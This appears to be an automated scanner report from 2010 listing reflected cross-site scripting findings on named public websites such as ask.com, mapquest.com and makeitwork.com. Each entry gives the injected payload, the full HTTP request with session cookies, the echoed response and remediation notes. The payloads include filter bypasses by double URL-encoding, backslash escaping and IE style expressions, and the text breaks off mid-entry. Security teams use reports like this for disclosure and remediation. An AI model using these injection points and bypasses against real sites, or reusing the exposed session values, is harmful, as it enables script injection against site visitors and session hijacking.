GET /pictures?q=Ohiocd16d\'%3b4e4b316f914&o=0&l=dir5fb41'%3balert(DOCUMENT.COOKIES)%2f%2fd1f92dec88a&qsrc=3015 HTTP/1.1 Host: www.ask.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ldst=sorg=-1|1290271661055; __utmz=252994457.1290271572.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-bG9zK2FuZ2VsZXMraXQrY29uc3VsdGluZw..; accepting=1; wz_scnt=1; gct=; puser=pt=U2F0LTIwLU5vdi0yMDEwLTE3OjAzOjI1LVVUQw%3D%3D&po=0&pp=dir5fb41%27%3Balert%28document.cookies%29%2F%2Fd1f92dec88a; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5597|0~5488|0~5489|0~5490|1; qc=0; cu.wz=0; gcht=; wz_sid=0B45CFE073F3F30B5FA9E877A6187EDA; wz_uid=074DCFE874F3F30B5FA9E877A6187EDA; __utma=252994457.227355931.1290271572.1290271572.1290271572.1; __utmc=252994457; user="o=0&l=dir5fb41'; __utmb=252994457.2.10.1290271572;
The value of the l request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5fb41'%3balert(1)//d1f92dec88a was submitted in the l parameter. This input was echoed as 5fb41';alert(1)//d1f92dec88a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /pictureslanding?o=0&l=dir5fb41'%3balert(1)//d1f92dec88a HTTP/1.1 Host: www.ask.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ldst=sorg=-1|1290271661055; __utmz=252994457.1290271572.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-bG9zK2FuZ2VsZXMraXQrY29uc3VsdGluZw..; accepting=1; wz_scnt=1; gct=; puser=pt=U2F0LTIwLU5vdi0yMDEwLTE2OjQ3OjQxLVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5597|0~5488|0~5489|0~5490|0~5491|0~5397|0; qc=0; cu.wz=0; gcht=; wz_sid=0346C8EF73F2B3A933ADE477A41477DA; wz_uid=0C41C9EC70F2B3A933ADE477A41477DA; __utma=252994457.227355931.1290271572.1290271572.1290271572.1; __utmc=252994457; user=o=0&l=dir; __utmb=252994457.2.10.1290271572;
The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 68661\'%3bad7a82f13fb was submitted in the q parameter. This input was echoed as 68661\\';ad7a82f13fb in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /pictureslanding?q=68661\'%3bad7a82f13fb&o=0&l=dir5fb41 HTTP/1.1 Host: www.ask.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ldst=sorg=-1|1290271661055; __utmz=252994457.1290271572.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-bG9zK2FuZ2VsZXMraXQrY29uc3VsdGluZw..; accepting=1; wz_scnt=1; gct=; puser=pt=U2F0LTIwLU5vdi0yMDEwLTE3OjAzOjI1LVVUQw%3D%3D&po=0&pp=dir5fb41%27%3Balert%28document.cookies%29%2F%2Fd1f92dec88a; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5597|0~5488|0~5489|0~5490|1; qc=0; cu.wz=0; gcht=; wz_sid=0B45CFE073F3F30B5FA9E877A6187EDA; wz_uid=074DCFE874F3F30B5FA9E877A6187EDA; __utma=252994457.227355931.1290271572.1290271572.1290271572.1; __utmc=252994457; user="o=0&l=dir5fb41'; __utmb=252994457.2.10.1290271572;
The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 41f84\'%3ba552257ac42 was submitted in the q parameter. This input was echoed as 41f84\\';a552257ac42 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /web?q=What+causes+brain+freeze%3F41f84\'%3ba552257ac42&gc=1&qsrc=3045&o=0&l=dir HTTP/1.1 Host: www.ask.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ldst=sorg=-1|1290271661055; __utmz=252994457.1290271572.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-bG9zK2FuZ2VsZXMraXQrY29uc3VsdGluZw..; accepting=1; wz_scnt=1; gct=; puser=pt=U2F0LTIwLU5vdi0yMDEwLTE2OjQ3OjQxLVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5597|0~5488|0~5489|0~5490|0~5491|0~5397|0; qc=0; cu.wz=0; gcht=; wz_sid=0346C8EF73F2B3A933ADE477A41477DA; wz_uid=0C41C9EC70F2B3A933ADE477A41477DA; __utma=252994457.227355931.1290271572.1290271572.1290271572.1; __utmc=252994457; user=o=0&l=dir; __utmb=252994457.2.10.1290271572;
The value of the qid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 558cb'%3balert(1)//ec1d53be65e was submitted in the qid parameter. This input was echoed as 558cb';alert(1)//ec1d53be65e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /web?q=los+angeles+it+consulting&qsrc=0&frstpgo=0&o=0&l=dir&qid=38FDBEE5438F532FB16A69B271896D79558cb'%3balert(1)//ec1d53be65e&page=2&jss= HTTP/1.1 Host: www.ask.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ldst=sorg=-1|1290271661055; __utmz=252994457.1290271572.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-bG9zK2FuZ2VsZXMraXQrY29uc3VsdGluZw..; accepting=1; wz_scnt=1; gct=; puser=pt=U2F0LTIwLU5vdi0yMDEwLTE2OjQ3OjQxLVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5597|0~5488|0~5489|0~5490|0~5491|0~5397|0; qc=0; cu.wz=0; gcht=; wz_sid=0346C8EF73F2B3A933ADE477A41477DA; wz_uid=0C41C9EC70F2B3A933ADE477A41477DA; __utma=252994457.227355931.1290271572.1290271572.1290271572.1; __utmc=252994457; user=o=0&l=dir; __utmb=252994457.2.10.1290271572;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>
<title>Ask.com - What's Yo ...[SNIP]... <script type="text/javascript"> var _psBack = '« Prev'; var _psForward = 'Next »'; var _psQueryID = '38FDBEE5438F532FB16A69B271896D79558cb';alert(1)//ec1d53be65e'; var _psQuerySource = '0'; var _psSiteID = ''; </script> ...[SNIP]...
2.144. http://www.avalanchepub.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.avalanchepub.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2f00b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d02eb00d6bf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2f00b'style='x:expression(alert(1))'d02eb00d6bf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /?2f00b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d02eb00d6bf=1 HTTP/1.1 Host: www.avalanchepub.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 976ff"><script>alert(1)</script>da45883e2da was submitted in the id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /includes/testimonial.php?id=dtb976ff"><script>alert(1)</script>da45883e2da HTTP/1.1 Host: www.dcgla.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=245246864.1290271625.1.1.utmcsr=ask|utmccn=(organic)|utmcmd=organic|utmctr=los%20angeles%20it%20consulting; ClickAndChat.com=109-1290271668886; __utma=245246864.1301270426.1290271625.1290271625.1290271625.1; __utmc=245246864; __utmb=245246864.4.10.1290271625;
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 20 Nov 2010 17:16:48 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 Content-type: text/html
2.146. http://www.dcgla.com/includes/testimonial.php [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.dcgla.com
Path:
/includes/testimonial.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e32d"><script>alert(1)</script>8b1a40d7583 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Connection: close Date: Sat, 20 Nov 2010 17:16:51 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 Content-type: text/html
2.147. http://www.directpointe.com/support/esupport_login.aspx [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.directpointe.com
Path:
/support/esupport_login.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc6ba"><script>alert(1)</script>9eb03b16144 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /support/esupport_login.aspx?dc6ba"><script>alert(1)</script>9eb03b16144=1 HTTP/1.1 Host: www.directpointe.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=217701123.1290271597.1.1.utmgclid=CPCVrMXsr6UCFVNb2godUGtIXA|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=los%20angeles%20it%20consulting; vkeywords=; s_sq=; __utma=217701123.1409149386.1290271597.1290271597.1290271597.1; velarosession=bs405bftbfjkfj55guiqnv45; velaroret5821=1; __utmc=217701123; __utmb=217701123.2.10.1290271597; ASP.NET_SessionId=tczsfa55n5sadr45wy0t5xqa; velaront1=yes;
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 20 Nov 2010 17:16:54 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 25395
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- Copyright .... 2000-2010 DirectPointe Inc. All rights reserved. All ...[SNIP]... <input type="hidden" name="errorURL" value="http://www.directpointe.com/support/esupport_login.aspx?dc6ba"><script>alert(1)</script>9eb03b16144=1" /> ...[SNIP]...
2.148. http://www.lang.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.lang.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ec76c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25279dd576fad79 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ec76c'style='x:expression(alert(1))'9dd576fad79 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /?ec76c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25279dd576fad79=1 HTTP/1.1 Host: www.lang.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
2.149. http://www.makeitwork.com/about/press-releases [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.makeitwork.com
Path:
/about/press-releases
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4d65%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3048996d15f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f4d65"><script>alert(1)</script>3048996d15f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /about/press-releases?f4d65%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3048996d15f=1 HTTP/1.1 Host: www.makeitwork.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=246358936.1290271612.1.1.utmgclid=CNTcksnsr6UCFRhg2godlBHrYA|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=los%20angeles%20it%20consulting; 8402d15662a4628733f3ad434ce06140=2na2t369v9umvdqdqv92diae06; __utma=246358936.1337497436.1290271612.1290271612.1290271612.1; __utmc=246358936; __utmb=246358936.1.10.1290271612;
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 17:20:01 GMT Server: Apache X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Last-Modified: Sat, 20 Nov 2010 17:20:01 GMT Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 41979
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f614c%2527%253balert%25281%2529%252f%252fc73f4c1f2ed was submitted in the REST URL parameter 3. This input was echoed as f614c';alert(1)//c73f4c1f2ed in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /plugins/system/rokboxf614c%2527%253balert%25281%2529%252f%252fc73f4c1f2ed/ HTTP/1.1 Host: www.makeitwork.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=246358936.1290271612.1.1.utmgclid=CNTcksnsr6UCFRhg2godlBHrYA|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=los%20angeles%20it%20consulting; 8402d15662a4628733f3ad434ce06140=2na2t369v9umvdqdqv92diae06; __utma=246358936.1337497436.1290271612.1290271612.1290271612.1; __utmc=246358936; __utmb=246358936.1.10.1290271612;
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 17:20:13 GMT Server: Apache X-Powered-By: PHP/5.2.14 Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 62493
if('Rokboxf614c';Alert(1)//C73f4c1f2ed') { var pattern = /Rokboxf614c';Alert(1)//C73f4c1f2ed/i; $(".services_header").filter(function(){ var string = $(this).text(); var found = pattern.test(string); if(found) { $("d ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload a42c5%253balert%25281%2529%252f%252fa87db967c5e was submitted in the REST URL parameter 3. This input was echoed as a42c5;alert(1)//a87db967c5e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /plugins/system/rokboxa42c5%253balert%25281%2529%252f%252fa87db967c5e/ HTTP/1.1
Host: www.makeitwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=246358936.1290271612.1.1.utmgclid=CNTcksnsr6UCFRhg2godlBHrYA|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=los%20angeles%20it%20consulting; 8402d15662a4628733f3ad434ce06140=2na2t369v9umvdqdqv92diae06; __utma=246358936.1337497436.1290271612.1290271612.1290271612.1; __utmc=246358936; __utmb=246358936.1.10.1290271612;
Response
HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:20:15 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 62664
if('Rokboxa42c5;Alert(1)//A87db967c5e') { var pattern = /Rokboxa42c5;Alert(1)//A87db967c5e/i; $(".services_header").filter(function(){ var string = $(this).text(); var found = pattern.test(string); if(found) { $("div[id^=m_], div[id^=s_]").css('display', 'none'); re ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload d26ef%253c%252ftitle%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253ed4c62d3506a was submitted in the REST URL parameter 3. This input was echoed as d26ef</title><img src=a onerror=alert(1)>d4c62d3506a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /plugins/system/rokboxd26ef%253c%252ftitle%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253ed4c62d3506a/ HTTP/1.1
Host: www.makeitwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=246358936.1290271612.1.1.utmgclid=CNTcksnsr6UCFRhg2godlBHrYA|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=los%20angeles%20it%20consulting; 8402d15662a4628733f3ad434ce06140=2na2t369v9umvdqdqv92diae06; __utma=246358936.1337497436.1290271612.1290271612.1290271612.1; __utmc=246358936; __utmb=246358936.1.10.1290271612;
Response
HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:20:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 62636
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <he ...[SNIP]... <title>Rokboxd26ef</Title><Img Src=A Onerror=Alert(1)>D4c62d3506a System, PLUGINS. Make It Work guarantees you will be delighted!</title> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 708b3"><img%20src%3da%20onerror%3dalert(1)>59fe09ce6a was submitted in the REST URL parameter 3. This input was echoed as 708b3"><img src=a onerror=alert(1)>59fe09ce6a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /plugins/system/rokbox708b3"><img%20src%3da%20onerror%3dalert(1)>59fe09ce6a/ HTTP/1.1
Host: www.makeitwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=246358936.1290271612.1.1.utmgclid=CNTcksnsr6UCFRhg2godlBHrYA|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=los%20angeles%20it%20consulting; 8402d15662a4628733f3ad434ce06140=2na2t369v9umvdqdqv92diae06; __utma=246358936.1337497436.1290271612.1290271612.1290271612.1; __utmc=246358936; __utmb=246358936.1.10.1290271612;
Response
HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:20:11 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 62683
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <he ...[SNIP]... <meta name="keywords" content="Make It Work provides the best Rokbox708b3"><Img Src=A Onerror=Alert(1)>59fe09ce6a services in System, PLUGINS. We guarantee you will be delighted! Call 877-625-3489." /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 93329<img%20src%3da%20onerror%3dalert(1)>230708c6484 was submitted in the REST URL parameter 3. This input was echoed as 93329<img src=a onerror=alert(1)>230708c6484 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /plugins/system/rokbox93329<img%20src%3da%20onerror%3dalert(1)>230708c6484/ HTTP/1.1
Host: www.makeitwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=246358936.1290271612.1.1.utmgclid=CNTcksnsr6UCFRhg2godlBHrYA|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=los%20angeles%20it%20consulting; 8402d15662a4628733f3ad434ce06140=2na2t369v9umvdqdqv92diae06; __utma=246358936.1337497436.1290271612.1290271612.1290271612.1; __utmc=246358936; __utmb=246358936.1.10.1290271612;
Response
HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:20:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 62454
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <he ...[SNIP]... <h1 class="title">Rokbox93329<Img Src=A Onerror=Alert(1)>230708c6484 Services in System, PLUGINS:</h1> ...[SNIP]...
The value of the country request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 28087</script><script>alert(1)</script>e99a017790b was submitted in the country parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /maps/map.adp?searchtype=address&country=28087</script><script>alert(1)</script>e99a017790b HTTP/1.1
Host: www.mapquest.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en" xml:lang="en" c ...[SNIP]... tegories":null,"charFilter":null,"displayQuery":null,"inflectionPointIndex":null,"latch":false,"latchQuery":null,"locale":"en","mapState":null,"mostPopularCategory":null,"page":0,"position":0,"query":"28087</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>E99A017790B","routeContext":null,"routeSessionId":null,"searchAroundLocation":null,"searchTerm":null,"searchType":"onMap","shapePoints":null,"showDetails":false,"sortType":"relevance","total":0},"name":null,"note ...[SNIP]...
2.156. http://www.turnerlicensing.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 616be%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527018d474a113 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 616be'style='x:expression(alert(1))'018d474a113 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
2.157. http://www.turnerlicensing.com/11x17_recordable_message_centers [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /11x17_recordable_message_centers
Issue detail
